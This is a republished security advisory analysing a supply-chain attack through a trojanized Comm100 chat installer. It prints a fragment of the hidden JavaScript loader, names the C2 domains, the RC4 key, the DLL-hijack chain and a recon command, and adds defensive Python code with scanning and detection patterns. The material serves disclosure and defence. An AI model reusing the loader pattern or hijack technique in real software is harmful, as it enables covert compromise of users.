Supply Chain Attack via a Trojanized Comm100 Chat Installer
Published 11/02/2022
Originally published by CrowdStrike.
- Using a combination of advanced machine learning and artificial intelligence, a new supply chain attack was identified during the installation of a chat-based customer engagement platform.
- The supply chain attack involved a trojanized installer for the Comm100 Live Chat application being deployed.
- Malware was delivered via a signed Comm100 installer that could be downloaded from the company’s website as recently as the morning of September 29, 2022.
- With moderate confidence, the actor responsible for this activity likely has a China nexus.
- Based on responsible disclosure, Comm100 has released an updated installer (10.0.9) that can be downloaded here.
Applying a combination of advanced machine learning (ML), artificial intelligence (AI) and deep analytics across the trillions of security events captured, a leading security company identified a new supply chain attack pattern during the installation of a chat-based customer engagement platform.
The company confirmed that the supply chain attack involved a trojanized installer for the Comm100 Live Chat application. This attack occurred from at least September 27, 2022 through the morning of September 29, 2022. The trojanized file was identified at organizations in the industrial, healthcare, technology, manufacturing, insurance and telecommunications sectors in North America and Europe.
Attack Details
Malware is delivered via a signed Comm100 installer that was downloadable from the company’s website. The installer was signed on September 26, 2022 at 14:54:00 UTC using a valid Comm100 Network Corporation certificate.
The security company confirmed that the Microsoft Windows 7+ desktop agent hosted at https[:]//dash11.comm100[.]io/livechat/electron/10000/Comm100LiveChat-Setup-win.exe, which was available until the morning of September 29, was a trojanized installer. Comm100 has since released an updated installer (10.0.9).
This installer (SHA256 hash: ac5c0823d623a7999f0db345611084e0a494770c3d6dd5feeba4199deee82b86) is an Electron application that contains a JavaScript (JS) backdoor within the file main.js of the embedded Asar archive.
(function(){if(!(typeof Buffer==="undefined")){require("http").get((function(){let b=Buffer.from('681c6818220d2243335a74157819630c620374077510600c6d143a59365b74187107620a6f03735c3f503c50355622','hex');
Figure 1. Initial JS Backdoor in main.js
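An added triage example, not code from the original alert or from Comm100: it parses the Chromium-pickle framed header of an Electron asar archive, walks the file tree, and flags any packed .js file that carries both markers of the Figure 1 loader shape (a long hex-encoded Buffer and an http get). The archive and its scripts are constructed in memory, and the two regex markers are a triage assumption, not a vendor signature.

```python
import json, re, struct

# Markers of the loader shape in Figure 1 (hex Buffer handed to an HTTP fetch).
LOADER_MARKERS = [
    re.compile(r'require\(\s*["\']https?["\']\s*\)\.get\('),
    re.compile(r'Buffer\.from\(\s*["\'][0-9a-fA-F]{32,}["\']\s*,\s*["\']hex["\']\s*\)'),
]

def read_asar_header(blob: bytes):
    """asar layout: u32(4) | u32 header_len | u32 payload_len | u32 json_len | json | pad;
    file bytes start at 8 + header_len. Returns (files tree, base offset)."""
    if len(blob) < 16 or struct.unpack_from("<I", blob, 0)[0] != 4:
        raise ValueError("not an asar archive")
    header_len, _, json_len = struct.unpack_from("<III", blob, 4)
    return json.loads(blob[16:16 + json_len])["files"], 8 + header_len

def walk_files(tree, prefix=""):
    """Yield (path, offset, size) for each packed file, recursing into directories."""
    for name, entry in tree.items():
        path = f"{prefix}/{name}" if prefix else name
        if "files" in entry:
            yield from walk_files(entry["files"], path)
        elif not entry.get("unpacked"):  # unpacked files live outside the archive
            yield path, int(entry["offset"]), int(entry["size"])

def find_loader_scripts(blob: bytes):
    """Return {path: matched patterns} for .js files that show every loader marker."""
    tree, base = read_asar_header(blob)
    hits = {}
    for path, off, size in walk_files(tree):
        text = blob[base + off:base + off + size].decode("utf-8", "replace")
        matched = [m.pattern for m in LOADER_MARKERS if m.search(text)]
        if path.endswith(".js") and len(matched) == len(LOADER_MARKERS):
            hits[path] = matched
    return hits

def build_asar(files: dict) -> bytes:
    """Build a flat asar archive in memory, only to keep this demo self-contained."""
    tree, body = {}, b""
    for name, data in files.items():
        tree[name] = {"size": len(data), "offset": str(len(body))}
        body += data
    js = json.dumps({"files": tree}).encode()
    payload = struct.pack("<I", len(js)) + js + b"\0" * (-len(js) % 4)
    header = struct.pack("<I", len(payload)) + payload
    return struct.pack("<II", 4, len(header)) + header + body

# Constructed sample: one benign script and one shaped like the Figure 1 loader.
SAMPLE_ASAR = build_asar({
    "package.json": b"{}",
    "main.js": b"(function(){if(!(typeof Buffer==='undefined')){require('http').get((function(){"
               b"let b=Buffer.from('" + b"41" * 24 + b"','hex');return b.toString();})())}})();",
    "renderer.js": b"const {app} = require('electron'); app.whenReady().then(() => {});",
})
```

To triage a real installer, extract app.asar from the Electron package and pass its bytes to find_loader_scripts.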
The backdoor downloads and executes a second-stage script from URL http[:]//api.amazonawsreplay[.]com/livehelp/collect.
The second-stage script consists of obfuscated JS containing a backdoor that gathers host information before providing the actor with remote shell functionality by spawning a new instance of cmd.exe.
The script also uses the command-and-control (C2) domain api.amazonawsreplay[.]com.
As part of likely follow-on activity, the actor installed additional malicious files on the affected host, including a malicious loader DLL named MidlrtMd.dll executed by a legitimate copy of a Microsoft Metadata Merge Utility (mdmerge.exe) binary via DLL search-order hijacking. The loader DLL decrypts a payload file named license using a customized variant of RC4 encryption with the hard-coded key U9ELetx8eMR8pd5koFamoOyuf9tTRTPG.
The decrypted payload consists of shellcode that is executed in memory and injects an embedded payload into a new instance of notepad.exe. The injected payload connects to the malicious C2 domain api.microsoftfileapis[.]com, which resolved to the IP address 8.219.167[.]156 at the time of the incident.
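An added detection example, not code from the original alert or from Comm100: it runs four checks over Sysmon-style telemetry for the follow-on chain described above (the genuine mdmerge.exe bytes running under another name, MidlrtMd.dll loaded from outside a system directory, the ProductId registry query from Table 4, and DNS lookups of the listed C2 domains). The hash and DLL name come from Table 2 and the domains from Table 3; the event dict shape and the sample events are constructed.

```python
import re

# Known-good hash of mdmerge.exe and the loader DLL name come from Table 2 and the C2
# domains from Table 3; the event shape and sample telemetry below are constructed.
MDMERGE_SHA256 = "ac9f2ae9de5126691b9391c990f9d4f1c25afa912fbfda2d4abfe9f9057bdd8c"
LOADER_DLL = "midlrtmd.dll"
C2_DOMAINS = {"api.microsoftfileapis.com", "api.amazonawsreplay.com",
              "selfhelp.windowstearns.com"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
PRODUCTID_QUERY = re.compile(r"reg(\.exe)?\s+query\s+.*currentversion.*\s/v\s+productid", re.I)

def basename(win_path: str) -> str:
    """Last component of a Windows path, lower-cased."""
    return win_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect(events):
    """Run the checks over Sysmon-style event dicts; return (rule, pid, detail) tuples."""
    alerts = []
    for e in events:
        kind, pid, image = e["type"], e["pid"], e["image"]
        if kind == "ProcessCreate":
            # The genuine mdmerge.exe bytes (known hash) running under a different name.
            if e.get("sha256", "").lower() == MDMERGE_SHA256 and basename(image) != "mdmerge.exe":
                alerts.append(("renamed-mdmerge", pid, image))
            # The ProductId lookup the JS backdoor runs to build its victim hash (Table 4).
            if PRODUCTID_QUERY.search(e.get("cmdline", "")):
                alerts.append(("productid-recon", pid, e["cmdline"]))
        elif kind == "ImageLoad":
            # MidlrtMd.dll resolved from the process's own directory, not a system directory.
            dll = e["loaded"]
            if basename(dll) == LOADER_DLL and not dll.lower().startswith(SYSTEM_DIRS):
                alerts.append(("dll-search-order-hijack", pid, dll))
        elif kind == "DnsQuery" and e["query"].lower() in C2_DOMAINS:
            alerts.append(("c2-domain", pid, e["query"]))
    return alerts

# Constructed sample telemetry; the last event is a benign control that must not alert.
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "pid": 4120, "image": r"C:\ProgramData\Cisco Core\CoreConnect.exe",
     "sha256": MDMERGE_SHA256, "cmdline": r"C:\ProgramData\Cisco Core\CoreConnect.exe"},
    {"type": "ImageLoad", "pid": 4120, "image": r"C:\ProgramData\Cisco Core\CoreConnect.exe",
     "loaded": r"C:\ProgramData\Cisco Core\MidlrtMd.dll"},
    {"type": "ProcessCreate", "pid": 4188, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductId'},
    {"type": "DnsQuery", "pid": 4200, "image": r"C:\Windows\System32\notepad.exe",
     "query": "api.microsoftfileapis.com"},
    {"type": "ProcessCreate", "pid": 5000, "image": r"C:\Tools\mdmerge.exe",
     "sha256": MDMERGE_SHA256, "cmdline": "mdmerge.exe"},
]
```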
Based on the company’s responsible disclosure, Comm100 has released an updated installer. Impacted Comm100 customers can download the latest exe version (10.0.9) here.
Comm100 further indicated it was performing a root cause analysis to obtain additional information.
Assessment
The payload delivered in this supply chain attack differs from payloads identified in previous incidents related to the same actor, targeting online gambling entities in Asia. Additionally, the recent activity differs from activity targeting online gambling in both the target scope and the supply chain attack mechanism delivering a trojanized app via Comm100’s website.
Despite these differences, the company assesses that the actor responsible for previously identified online gambling targeting is also likely responsible for these recent incidents. This assessment is made with moderate confidence based on the following factors:
- The use of chat software to deliver malware
- The use of the Microsoft Metadata Merge Utility binary to load a malicious DLL named MidlrtMd.dll
- C2 domain-naming convention using Microsoft and Amazon-themed domains along with api. subdomains
- C2 domains hosted on Alibaba infrastructure
Furthermore, with moderate confidence, this actor likely has a China nexus. This assessment is based on the presence of Chinese-language comments in the malware, aforementioned tactics, techniques and procedures (TTPs), and the connection to the targeting of online gambling entities in East and Southeast Asia — a previously established area of focus for China-nexus targeted intrusion actors.
Intelligence Confidence Assessment
High Confidence: Judgments are based on high-quality information from multiple sources. High confidence in the quality and quantity of source information supporting a judgment does not imply that the assessment is an absolute certainty or fact. The judgment still has a marginal probability of being inaccurate.
Moderate Confidence: Judgments are based on information that is credibly sourced and plausible, but not of sufficient quantity or corroborated sufficiently to warrant a higher level of confidence. This level of confidence is used to express that judgments carry an increased probability of being incorrect until more information is available or corroborated.
Low Confidence: Judgments are made where the credibility of the source is uncertain, the information is too fragmented or too poorly corroborated to support solid analytic inferences, or the reliability of the source is untested. Further information is needed to corroborate the information or to fill known intelligence gaps.
Indicators
| SHA256 Hash | Comm100 File Version |
|---|---|
| 6f0fae95f5637710d1464b42ba49f9533443181262f78805d3ff13bea3b8fd45 (this file contains the same backdoor, but it has not been observed in the wild) | 10.0.72 |
| ac5c0823d623a7999f0db345611084e0a494770c3d6dd5feeba4199deee82b86 | 10.0.8 |

Table 1. Trojanized Comm100 Application Executables
| Filename | SHA256 Hash | Description |
|---|---|---|
| C:\ProgramData\Cisco Core\CoreConnect.exe | ac9f2ae9de5126691b9391c990f9d4f1c25afa912fbfda2d4abfe9f9057bdd8c | Legitimate mdmerge.exe executable |
| C:\ProgramData\Cisco Core\MidlrtMd.dll | 6194d57fc3bc35acf9365b764338adefacecfacf5955b87ad6a5b753fb6081f8 | Malicious loader DLL |
| C:\ProgramData\Cisco Core\license | c930a28878a5dd49f7c8856473ff452ddbdab8099acd6900047d9b3c6e88edca | Encrypted payload configured with C2 domain api.microsoftfileapis[.]com |

Table 2. Observed Implant Likely Deployed by the Actor
| Network Indicator | Description |
|---|---|
| http[:]//api.amazonawsreplay[.]com/collect_log | JS backdoor logging URL |
| http[:]//api.amazonawsreplay[.]com | JS backdoor C2 |
| http[:]//api.amazonawsreplay[.]com/livehelp/init | JS backdoor C2 |
| http[:]//api.microsoftfileapis[.]com | Encrypted payload C2 host |
| https[:]//selfhelp[.]windowstearns[.]com | Related encrypted payload C2 host |
| http[:]//api.amazonawsreplay[.]com/livehelp/collect | Staging URL for JS backdoor |

Table 3. Network Indicators Related to Activity Described in this Alert
| Command Line | Description |
|---|---|
| reg query "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductId | Used in the JS backdoor to compute an MD5 victim hash |

Table 4. Command-Line Indicators Related to Activity Described in this Alert